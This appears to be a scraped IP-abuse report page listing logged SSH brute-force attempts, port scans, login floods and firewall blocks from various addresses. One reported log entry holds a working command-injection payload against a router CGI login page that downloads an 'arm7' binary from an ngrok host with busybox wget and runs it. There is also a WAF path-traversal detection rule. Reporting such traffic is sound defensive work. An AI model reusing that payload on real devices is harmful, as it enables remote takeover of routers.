City: unknown
Region: unknown
Country: China
Internet Service Provider: ChinaNet Chongqing Province Network
Hostname: unknown
Organization: unknown
Usage Type: unknown
IP | Type | Details | Datetime |
---|---|---|---|
14.111.93.6 | attack | Jan 12 15:05:01 hostnameproxy sshd[8555]: Invalid user usertest from 14.111.93.6 port 60732 Jan 12 15:05:01 hostnameproxy sshd[8555]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.6 Jan 12 15:05:02 hostnameproxy sshd[8555]: Failed password for invalid user usertest from 14.111.93.6 port 60732 ssh2 Jan 12 15:08:10 hostnameproxy sshd[8669]: Invalid user lee from 14.111.93.6 port 59046 Jan 12 15:08:10 hostnameproxy sshd[8669]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.6 Jan 12 15:08:12 hostnameproxy sshd[8669]: Failed password for invalid user lee from 14.111.93.6 port 59046 ssh2 Jan 12 15:11:13 hostnameproxy sshd[8840]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.6 user=r.r Jan 12 15:11:15 hostnameproxy sshd[8840]: Failed password for r.r from 14.111.93.6 port 57358 ssh2 Jan 12 15:14:42 hostnameproxy sshd[8920]: ........ ------------------------------ |
2020-01-13 07:17:41 |
14.111.93.237 | attackbotsspam | $f2bV_matches |
2020-01-11 23:45:59 |
14.111.93.184 | attackbotsspam | SSH Brute Force |
2019-12-24 05:53:37 |
14.111.93.93 | attackbotsspam | 2019-12-13T02:01:33.290301-07:00 suse-nuc sshd[22839]: Invalid user getuiza from 14.111.93.93 port 57488 ... |
2019-12-13 22:11:46 |
14.111.93.103 | attackbots | Dec 1 08:30:25 MK-Soft-VM4 sshd[26696]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.103 Dec 1 08:30:27 MK-Soft-VM4 sshd[26696]: Failed password for invalid user martinengo from 14.111.93.103 port 44654 ssh2 ... |
2019-12-01 15:34:59 |
14.111.93.168 | attackspambots | Nov 27 08:07:10 www5 sshd\[27269\]: Invalid user adm from 14.111.93.168 Nov 27 08:07:10 www5 sshd\[27269\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.168 Nov 27 08:07:12 www5 sshd\[27269\]: Failed password for invalid user adm from 14.111.93.168 port 38886 ssh2 ... |
2019-11-27 14:18:01 |
14.111.93.206 | attackspam | Nov 22 13:55:07 hpm sshd\[13032\]: Invalid user guest from 14.111.93.206 Nov 22 13:55:07 hpm sshd\[13032\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.206 Nov 22 13:55:10 hpm sshd\[13032\]: Failed password for invalid user guest from 14.111.93.206 port 45872 ssh2 Nov 22 13:59:18 hpm sshd\[13366\]: Invalid user ocadmin from 14.111.93.206 Nov 22 13:59:18 hpm sshd\[13366\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.206 |
2019-11-23 08:38:53 |
14.111.93.128 | attackspam | Nov 11 12:57:55 vps666546 sshd\[13422\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.128 user=root Nov 11 12:57:56 vps666546 sshd\[13422\]: Failed password for root from 14.111.93.128 port 41136 ssh2 Nov 11 13:02:38 vps666546 sshd\[13579\]: Invalid user hypnosis from 14.111.93.128 port 48486 Nov 11 13:02:38 vps666546 sshd\[13579\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.128 Nov 11 13:02:40 vps666546 sshd\[13579\]: Failed password for invalid user hypnosis from 14.111.93.128 port 48486 ssh2 ... |
2019-11-11 20:10:48 |
14.111.93.172 | attack | Lines containing failures of 14.111.93.172 Nov 8 12:25:52 cdb sshd[27989]: Invalid user wade from 14.111.93.172 port 60648 Nov 8 12:25:52 cdb sshd[27989]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.172 Nov 8 12:25:54 cdb sshd[27989]: Failed password for invalid user wade from 14.111.93.172 port 60648 ssh2 Nov 8 12:25:55 cdb sshd[27989]: Received disconnect from 14.111.93.172 port 60648:11: Bye Bye [preauth] Nov 8 12:25:55 cdb sshd[27989]: Disconnected from invalid user wade 14.111.93.172 port 60648 [preauth] Nov 8 12:42:16 cdb sshd[28995]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.172 user=r.r Nov 8 12:42:18 cdb sshd[28995]: Failed password for r.r from 14.111.93.172 port 54298 ssh2 Nov 8 12:42:18 cdb sshd[28995]: Received disconnect from 14.111.93.172 port 54298:11: Bye Bye [preauth] Nov 8 12:42:18 cdb sshd[28995]: Disconnected from authenticating use........ ------------------------------ |
2019-11-09 00:20:05 |
14.111.93.252 | attackspam | Lines containing failures of 14.111.93.252 Nov 6 18:54:18 shared12 sshd[7267]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.252 user=r.r Nov 6 18:54:21 shared12 sshd[7267]: Failed password for r.r from 14.111.93.252 port 33524 ssh2 Nov 6 18:54:21 shared12 sshd[7267]: Received disconnect from 14.111.93.252 port 33524:11: Bye Bye [preauth] Nov 6 18:54:21 shared12 sshd[7267]: Disconnected from authenticating user r.r 14.111.93.252 port 33524 [preauth] Nov 6 19:15:21 shared12 sshd[13663]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.252 user=r.r Nov 6 19:15:22 shared12 sshd[13663]: Failed password for r.r from 14.111.93.252 port 60010 ssh2 Nov 6 19:15:23 shared12 sshd[13663]: Received disconnect from 14.111.93.252 port 60010:11: Bye Bye [preauth] Nov 6 19:15:23 shared12 sshd[13663]: Disconnected from authenticating user r.r 14.111.93.252 port 60010 [preauth] No........ ------------------------------ |
2019-11-07 19:06:02 |
14.111.93.119 | attack | Nov 3 17:18:07 server sshd\[30491\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.119 user=root Nov 3 17:18:08 server sshd\[30491\]: Failed password for root from 14.111.93.119 port 44592 ssh2 Nov 3 17:30:23 server sshd\[1785\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.119 user=root Nov 3 17:30:24 server sshd\[1785\]: Failed password for root from 14.111.93.119 port 39342 ssh2 Nov 3 17:35:34 server sshd\[3217\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.119 user=root ... |
2019-11-04 00:53:26 |
14.111.93.116 | attackbots | Oct 29 03:38:56 fwweb01 sshd[28216]: Invalid user zy from 14.111.93.116 Oct 29 03:38:56 fwweb01 sshd[28216]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.116 Oct 29 03:38:58 fwweb01 sshd[28216]: Failed password for invalid user zy from 14.111.93.116 port 46638 ssh2 Oct 29 03:38:58 fwweb01 sshd[28216]: Received disconnect from 14.111.93.116: 11: Bye Bye [preauth] Oct 29 03:43:40 fwweb01 sshd[28465]: Invalid user smhostnameh from 14.111.93.116 Oct 29 03:43:40 fwweb01 sshd[28465]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.116 Oct 29 03:43:41 fwweb01 sshd[28465]: Failed password for invalid user smhostnameh from 14.111.93.116 port 55066 ssh2 Oct 29 03:43:42 fwweb01 sshd[28465]: Received disconnect from 14.111.93.116: 11: Bye Bye [preauth] Oct 29 03:54:27 fwweb01 sshd[29050]: Invalid user fangyuan from 14.111.93.116 Oct 29 03:54:27 fwweb01 sshd[29050]: pam_unix(sshd........ ------------------------------- |
2019-10-30 18:15:33 |
14.111.93.253 | attackspam | Oct 25 15:31:37 ip-172-31-1-72 sshd[3342]: Invalid user zoey from 14.111.93.253 Oct 25 15:31:37 ip-172-31-1-72 sshd[3342]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.253 Oct 25 15:31:39 ip-172-31-1-72 sshd[3342]: Failed password for invalid user zoey from 14.111.93.253 port 47998 ssh2 Oct 25 15:36:35 ip-172-31-1-72 sshd[3804]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.253 user=r.r Oct 25 15:36:36 ip-172-31-1-72 sshd[3804]: Failed password for r.r from 14.111.93.253 port 53814 ssh2 ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=14.111.93.253 |
2019-10-27 08:22:48 |
14.111.93.67 | attackspambots | Oct 21 05:07:29 riskplan-s sshd[5169]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.67 user=r.r Oct 21 05:07:31 riskplan-s sshd[5169]: Failed password for r.r from 14.111.93.67 port 58304 ssh2 Oct 21 05:07:31 riskplan-s sshd[5169]: Received disconnect from 14.111.93.67: 11: Bye Bye [preauth] Oct 21 05:23:45 riskplan-s sshd[5351]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.67 user=r.r Oct 21 05:23:47 riskplan-s sshd[5351]: Failed password for r.r from 14.111.93.67 port 56892 ssh2 Oct 21 05:23:47 riskplan-s sshd[5351]: Received disconnect from 14.111.93.67: 11: Bye Bye [preauth] Oct 21 05:28:32 riskplan-s sshd[5394]: Invalid user ubnt from 14.111.93.67 Oct 21 05:28:32 riskplan-s sshd[5394]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.111.93.67 Oct 21 05:28:34 riskplan-s sshd[5394]: Failed password for invalid user ub........ ------------------------------- |
2019-10-23 08:04:28 |
14.111.93.213 | attackbots | SSH Bruteforce |
2019-10-06 14:54:22 |
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 14.111.93.241
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 43232
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;14.111.93.241. IN A
;; AUTHORITY SECTION:
. 469 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019120600 1800 900 604800 86400
;; Query time: 105 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Dec 06 19:56:17 CST 2019
;; MSG SIZE rcvd: 117
Host 241.93.111.14.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 241.93.111.14.in-addr.arpa: NXDOMAIN
IP | Type | Details | Datetime |
---|---|---|---|
192.35.168.237 | attackspam |
|
2020-08-07 22:34:07 |
181.48.164.98 | attackspam | [06/Aug/2020:11:51:59 -0400] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" Blank UA |
2020-08-07 22:49:31 |
218.92.0.250 | attackbotsspam | Aug 7 16:31:22 ip40 sshd[24028]: Failed password for root from 218.92.0.250 port 16254 ssh2 Aug 7 16:31:28 ip40 sshd[24028]: Failed password for root from 218.92.0.250 port 16254 ssh2 ... |
2020-08-07 22:50:35 |
213.166.73.17 | attack | [FriAug0714:05:59.9525562020][:error][pid5825:tid139903400621824][client213.166.73.17:43015][client213.166.73.17]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch"\(\?i\)\(\?:\\\\\\\\x5c\|\(\?:%\(\?:2\(\?:5\(\?:2f\|5c\)\|F\|f\)\|c\(\?:0%\(\?:9v\|af\)\|1\)\|u\(\?:221[56]\|002f\)\|2\(\?:F\|F\)\|e0??\|1u\|5c\)\|\\\\\\\\/\)\)\(\?:%\(\?:2\(\?:\(\?:52\)\?e\|E\)\|\(\?:e0%8\|c\)0?\|u\(\?:002e\|2024\)\|2\(\?:E\|E\)\)\|\\\\\\\\.\){2}\(\?:\\\\\\\\x5c\|\(\?:%\(\?:2\(\?:5\(\?:2f\|5c\)\|F\|f\)\|c\(\?:0%\(\?:9v\|af\)\|1\)\|..."atARGS:file.[file"/usr/local/apache.ea3/conf/modsec_rules/10_asl_rules.conf"][line"198"][id"340007"][rev"47"][msg"Atomicorp.comWAFRules:GenericPathRecursiondenied"][data"/../\,ARGS:file"][severity"CRITICAL"][hostname"appalti-contratti.ch"][uri"/wp-content/plugins/db-backup/download.php"][unique_id"Xy1Dp8ORMJ9rBuORKRvdLAAAAMw"][FriAug0714:06:04.5502172020][:error][pid9433:tid139903400621824][client213.166.73.17:41231][client213.166.73.17]ModSecurity:Accessdeniedwithcode |
2020-08-07 22:45:01 |
113.91.91.16 | attackspam | Helo |
2020-08-07 22:17:38 |
104.248.29.200 | attack | 104.248.29.200 - - [07/Aug/2020:13:06:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2017 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 104.248.29.200 - - [07/Aug/2020:13:06:12 +0100] "POST /wp-login.php HTTP/1.1" 200 1994 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 104.248.29.200 - - [07/Aug/2020:13:06:12 +0100] "POST /xmlrpc.php HTTP/1.1" 403 219 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ... |
2020-08-07 22:43:10 |
34.77.127.43 | attackspambots | 2020-08-07T13:59:27.891804shield sshd\[9759\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=43.127.77.34.bc.googleusercontent.com user=root 2020-08-07T13:59:29.517138shield sshd\[9759\]: Failed password for root from 34.77.127.43 port 59994 ssh2 2020-08-07T14:03:33.149510shield sshd\[10087\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=43.127.77.34.bc.googleusercontent.com user=root 2020-08-07T14:03:35.220667shield sshd\[10087\]: Failed password for root from 34.77.127.43 port 48044 ssh2 2020-08-07T14:07:48.873511shield sshd\[10495\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=43.127.77.34.bc.googleusercontent.com user=root |
2020-08-07 22:36:23 |
60.166.13.90 | attack | (ftpd) Failed FTP login from 60.166.13.90 (CN/China/-): 10 in the last 3600 secs |
2020-08-07 22:42:24 |
189.59.5.81 | attackspam | (imapd) Failed IMAP login from 189.59.5.81 (BR/Brazil/centershop.static.gvt.net.br): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: Aug 7 16:35:56 ir1 dovecot[3110802]: imap-login: Disconnected (auth failed, 1 attempts in 10 secs): user= |
2020-08-07 22:45:52 |
50.236.62.30 | attack | SSH Login Bruteforce |
2020-08-07 22:15:16 |
152.32.164.147 | attackspambots | Port Scan ... |
2020-08-07 22:47:05 |
218.92.0.248 | attackspam | Aug 7 16:31:11 ns381471 sshd[626]: Failed password for root from 218.92.0.248 port 9599 ssh2 Aug 7 16:31:26 ns381471 sshd[626]: error: maximum authentication attempts exceeded for root from 218.92.0.248 port 9599 ssh2 [preauth] |
2020-08-07 22:52:30 |
117.50.49.57 | attack | Aug 7 18:15:51 gw1 sshd[25959]: Failed password for root from 117.50.49.57 port 57224 ssh2 ... |
2020-08-07 22:14:16 |
106.12.88.232 | attack | Aug 7 14:06:32 debian-2gb-nbg1-2 kernel: \[19060443.407839\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=106.12.88.232 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=233 ID=64858 PROTO=TCP SPT=47714 DPT=13673 WINDOW=1024 RES=0x00 SYN URGP=0 |
2020-08-07 22:29:15 |
80.244.179.6 | attackbots | 2020-08-07T14:30:02.124864shield sshd\[12342\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=school.asazs.co.uk user=root 2020-08-07T14:30:03.998207shield sshd\[12342\]: Failed password for root from 80.244.179.6 port 51420 ssh2 2020-08-07T14:33:17.555643shield sshd\[12627\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=school.asazs.co.uk user=root 2020-08-07T14:33:19.530047shield sshd\[12627\]: Failed password for root from 80.244.179.6 port 46382 ssh2 2020-08-07T14:36:36.920445shield sshd\[12833\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=school.asazs.co.uk user=root |
2020-08-07 22:44:32 |